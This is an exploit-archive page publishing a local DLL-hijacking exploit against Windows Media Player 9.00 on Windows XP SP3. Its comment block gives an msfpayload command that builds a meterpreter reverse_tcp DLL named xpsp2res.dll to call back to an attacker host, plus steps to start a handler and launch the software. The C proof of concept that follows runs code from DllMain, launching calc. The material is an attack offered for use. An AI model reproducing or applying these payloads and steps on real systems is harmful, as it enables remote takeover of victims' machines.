facebook facebook twitter rss

Windows Media Player 9.00 DLL HiJacking (xpsp2res.dll)

Author: Bedo Mado , Published: 06-04-2015
Windows Media Player 9.00 DLL HiJacking (xpsp2res.dll).c

/*
#[+] Author: Bedo Mado
#[+] Exploit Title: Windows Media Player 9.00.00.4510
#[+] Date: 4-4-2015
#[+] Type: Local Exploits
#[+] Vendor: http://en.softonic.com/s/free-dvd-decoder-media-player-9.00.00.4510-windows-xp-media-player
#[+] Tested on: WinXpSp3
#[+]Infected Dll Library --> hnetcfg.dll
#[+]exploit with metasploit :>
(1)Make dll payload :> msfpayload windows/meterpreter/reverse_tcp LHOST=XXX.XXX.X.X LPORT=XXXX D > xpsp2res.dll
(3)start multi handler
(4)Execute The software
(5)Close The software
#[+] BOOOOOM !!!! Meterpreter sessions oppened
#[+] GR33TZ : Hassan Abd Elaziz - Kerolos Ezz - Toni - ViRus Os - Rami Kilwa - EgyptSoldiers - AnuBis Egy
#[+] facebook : fb.com/Bedo0.Mado0
#if you Want To Experience The Exploit. Copy it to the software dir. then execute the software , calc.exe will launch ^_^.
Proof of Concept (PoC):
============================
*/

#include <windows.h>

int Hijacked()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
Hijacked();
return 0;
}

Like us on Facebook :